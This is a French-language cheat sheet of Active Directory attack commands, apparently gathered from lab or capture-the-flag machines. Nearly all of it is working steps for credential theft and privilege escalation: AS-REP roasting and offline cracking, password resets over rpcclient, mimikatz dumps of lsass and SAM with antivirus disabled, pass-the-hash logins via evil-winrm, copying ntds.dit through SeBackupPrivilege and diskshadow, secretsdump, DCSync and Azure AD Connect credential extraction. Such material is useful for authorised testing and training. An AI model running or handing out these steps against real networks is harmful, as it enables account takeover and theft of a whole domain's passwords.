Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. Télécharger PingCastle de pingcastle.com pour générer des rapports
Obtenir une liste d’utilisateurs d’active directory
smbclient -L \\\\10.10.10.10
ls
smbclient -L \\\\10.10.10.10\profile$
ls #permet d'obtenir une liste d'utilisateurs
GetNPUsers.py mydomain.local/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket
john --wordlist=rockyou.txt hashes.txt
smbclient //10.10.10.10/theshare -U theuserSe connecter à RPC et réinitialiser des mots de passe
rpcclient //10.10.10.10 -U theuser (ou rpcclient //10.10.10.10 -U "" ou enum4linux)
rpcclient $> srvinfo
rpcclient $> enumprinters
rpcclient $> enumdomusers
rpcclient $> queryuser 0x44f
rpcclient $> setuserinfo2 audit2020 23 'R0cker123' #réinitialiser le mot de passeSi nous avons un fichier lsass.DMP, nous pouvons l’analyser pour récupérer un hash et nous connecter sur d’autres machines
ps
.\mimikatz.exe (antivirus désactivé)
sekurlsa::LogonPassswords
evil-winrm -i 10.10.10.192 -H 9658d1d1dcd9250115e2205d9f48400d -u svc_backup
Avoir la liste des permissions de l’usager courant
whoami /all
Escalader les privlèges SeBackupPrivilege et SeRestorePrivilege en administrateur
reg save HKLM\SYSTEM c:\temp\system.hive
Reg save HKLM\SAM c:\temp\sam.hive
.\mimikatz.exe
privilege::debug
token::elevate
log hash.txt
lsadump::sam system.hive sam.hive
evil-winrm -i 10.10.10.60 -H eeef902eae0d740df6257f273ff75051 -u Administrator
hashcat -m 1000 -a 0 --force --show --username hash.txt (hash.txt au format suivant: Administrateur:hash1,r0cker:hash2) #pour cracker les hash
Comment Extraire ntdis. Mettre dans le fichier germain.txt
set context persistent nowriters@
add volume c: alias germain@
create@
expose %germain% z:@
diskshadow.exe /s germain.txt
Il faut télécharger les dll:
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\tmp\ntds.dit
ls
Extraire NTDS.DIT
secretsdump.py -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -ouput dumphash
evil-winrm -i 10.10.10.20 -H 123445324546543654 -u Administrator
DCSync permet d’émuler un controlleur de domaines pour retrouver les mots de passe via une réplication de domaine. Quand l’attaqant a un account qui a les privilèges de répliquer un domaine, l’attaquant pour utiliser le protocole de réplication pour simuler un controleur de domaines.
import-module ./Azure-ADConnect.ps1
Azure-ADConnect.ps1 -server 127.0.0.1 -db ADSync
